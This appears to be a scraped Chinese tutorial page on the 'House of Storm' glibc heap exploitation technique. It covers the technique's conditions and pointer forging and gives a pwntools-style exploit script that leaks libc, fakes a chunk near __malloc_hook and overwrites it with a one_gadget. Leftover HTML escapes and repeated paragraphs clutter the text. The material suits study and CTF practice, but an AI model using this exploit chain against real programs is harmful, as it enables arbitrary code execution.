House Of Storm 攻击技术详解<\/h1>

背景知识<\/h2>
House Of Storm 是一种结合了 unsortedbin attack 和 Largebin attack 的攻击技术，其基本原理和 Largebin attack 类似，可以达到任意地址写的效果。这种攻击危害性很大，但利用条件也非常苛刻。<\/p>

利用条件<\/h2>

glibc版本限制<\/strong>：glibc版本必须小于2.30，因为2.30之后加入了安全检查<\/li>

堆块布置要求<\/strong>：

攻击者需要在largebin和unsorted_bin中分别布置一个chunk<\/li>
这两个chunk在归位后必须处于同一个largebin的index中<\/li>
unsortedbin中的chunk要比largebin中的大<\/li> <\/ul> <\/li>
指针控制要求<\/strong>：

需要控制unsorted_bin中的bk指针<\/li>
需要控制largebin中的bk指针和bk_nextsize指针<\/li> <\/ul> <\/li> <\/ol>
技术原理<\/h2>
House Of Storm 利用了glibc在将unsorted bin中的chunk放入large bin时的处理逻辑漏洞。主要涉及以下关键点：<\/p>

unsorted bin管理<\/strong>：<\/p>

当一个较大的chunk被分割后，剩余部分大于MINSIZE时会放入unsorted bin<\/li>
释放不属于fast bin且不与top chunk紧邻的chunk会首先放入unsorted bin<\/li>
Unsorted bin是空闲chunk回归所属bin之前的缓冲区，处于bin数组下标1处<\/li> <\/ul> <\/li>

large bin管理<\/strong>：<\/p>

Largebin用于收容超过0x400大小以上的chunk(64位)<\/li>
是一个双向链表，共可容纳63个chunk<\/li>
按照大小范围分为6组，每组有不同的差值范围<\/li> <\/ul> <\/li> <\/ol>
利用步骤<\/h2>

初始设置<\/strong>：<\/p>
unsorted_bin-><\/span>fd =<\/span> 0<\/span> <\/span><\/span>unsorted_bin-><\/span>bk =<\/span> fake_chunk <\/span><\/span>large_bin-><\/span>fd =<\/span> 0<\/span> <\/span><\/span>large_bin-><\/span>bk =<\/span> fake_chunk+<\/span>8<\/span> <\/span><\/span>large_bin-><\/span>fd_nextsize =<\/span> 0<\/span> <\/span><\/span>large_bin-><\/span>bk_nextsize =<\/span> fake_chunk -<\/span> 0x18<\/span> -<\/span>5<\/span> <\/span><\/span><\/code><\/pre><\/li> 绕过检查的关键点<\/strong>：<\/p> unsorted_bin->bk = fake_chunk (把fake_chunk链到unsorted_bin中)<\/li> fake_chunk+0x10 = unsorted_bin (伪造fake_chunk的fd)<\/li> fake_chunk+0x3 = unsorted_chunk (伪造fake_chunk的size)<\/li> fake_chunk+0x18 = unsorted_chunk (伪造fake_chunk的bk)<\/li> <\/ul> <\/li> <\/ol> 实际利用示例<\/h2> 以下是一个简单的利用流程：<\/p> 堆块布置<\/strong>：<\/p> add(0x20<\/span>) <\/span><\/span>add(0x400<\/span>) #1<\/span> <\/span><\/span>add(0x20<\/span>) <\/span><\/span>add(0x410<\/span>) #3<\/span> <\/span><\/span>add(0x20<\/span>) <\/span><\/span>add(0x20<\/span>) #5<\/span> <\/span><\/span>add(0x20<\/span>) <\/span><\/span><\/code><\/pre><\/li> 释放堆块<\/strong>：<\/p> delete(1<\/span>) <\/span><\/span>delete(3<\/span>) <\/span><\/span>delete(5<\/span>) <\/span><\/span><\/code><\/pre><\/li> 泄露libc地址<\/strong>：<\/p> show(1<\/span>) <\/span><\/span>libc_base =<\/span> u64(p.<\/span>recvuntil('<\/span>\x7f<\/span>'<\/span>)[-<\/span>6<\/span>:].<\/span>ljust(8<\/span>, '<\/span>\x00<\/span>'<\/span>)) -<\/span> 0x3c4b78<\/span> <\/span><\/span>malloc_hook =<\/span> libc_base +<\/span> libc.<\/span>sym['__malloc_hook'<\/span>] <\/span><\/span>fake_chunk =<\/span> malloc_hook -<\/span> 0x50<\/span> <\/span><\/span><\/code><\/pre><\/li> 重新分配和编辑<\/strong>：<\/p> add(0x20<\/span>) <\/span><\/span>add(0x410<\/span>) #3<\/span> <\/span><\/span>delete(3<\/span>) <\/span><\/span> <\/span><\/span># 设置伪造指针<\/span> <\/span><\/span>payload =<\/span> p64(0<\/span>) +<\/span> p64(fake_chunk) <\/span><\/span>edit(3<\/span>, payload) # chunk3_bk-->fake_chunk<\/span> <\/span><\/span> <\/span><\/span>payload =<\/span> p64(0<\/span>) +<\/span> p64(fake_chunk +<\/span> 0x8<\/span>) +<\/span> p64(0<\/span>) +<\/span> p64(fake_chunk -<\/span> 0x18<\/span> -<\/span> 5<\/span>) <\/span><\/span>edit(1<\/span>, payload) # chunk1_bk-->fake_chunk+8, chunk1_bk_nextsize-->fake_chunk-0x18-5<\/span> <\/span><\/span><\/code><\/pre><\/li> 触发漏洞<\/strong>：<\/p> add(0x48<\/span>) #9<\/span> <\/span><\/span>og =<\/span> libc_base +<\/span> ogs[1<\/span>] <\/span><\/span>payload =<\/span> p64(og)*<\/span>8<\/span> +<\/span> p64(og) <\/span><\/span>edit(9<\/span>, payload) <\/span><\/span>add(0x20<\/span>) # 触发malloc_hook执行<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 关键点总结<\/h2> 版本限制<\/strong>：必须使用glibc < 2.30版本<\/li> 堆块大小关系<\/strong>：unsorted bin中的chunk必须比large bin中的大<\/li> 指针控制<\/strong>：需要精确控制多个指针的值<\/li> fake_chunk构造<\/strong>：需要精心构造fake_chunk的各个字段以绕过检查<\/li> size字段伪造<\/strong>：通过large_bin->bk_nextsize = fake_chunk - 0x18 -5的设置，使得fake_chunk的size为0x56，P位为0<\/li> <\/ol> 防御措施<\/h2> 升级glibc到2.30及以上版本<\/li> 加强堆指针的检查机制<\/li> 实现更严格的size字段验证<\/li> <\/ol> House Of Storm是一种高级的堆利用技术，需要深入理解glibc的内存管理机制才能成功利用。在实际漏洞利用中，需要根据目标环境的具体情况调整利用策略。<\/p>

House Of Storm 攻击技术详解<\/h1>

背景知识<\/h2> House Of Storm 是一种结合了 unsortedbin attack 和 Largebin attack 的攻击技术，其基本原理和 Largebin attack 类似，可以达到任意地址写的效果。这种攻击危害性很大，但利用条件也非常苛刻。<\/p>

背景知识<\/h2>
House Of Storm 是一种结合了 unsortedbin attack 和 Largebin attack 的攻击技术，其基本原理和 Largebin attack 类似，可以达到任意地址写的效果。这种攻击危害性很大，但利用条件也非常苛刻。<\/p>